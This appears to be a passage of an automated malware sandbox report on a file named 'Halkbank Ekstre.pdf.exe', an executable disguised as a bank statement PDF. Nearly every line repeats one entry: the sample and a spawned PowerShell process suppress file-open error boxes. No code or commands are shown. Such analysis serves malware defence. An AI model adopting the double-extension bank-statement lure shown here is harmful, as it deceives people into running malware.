                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
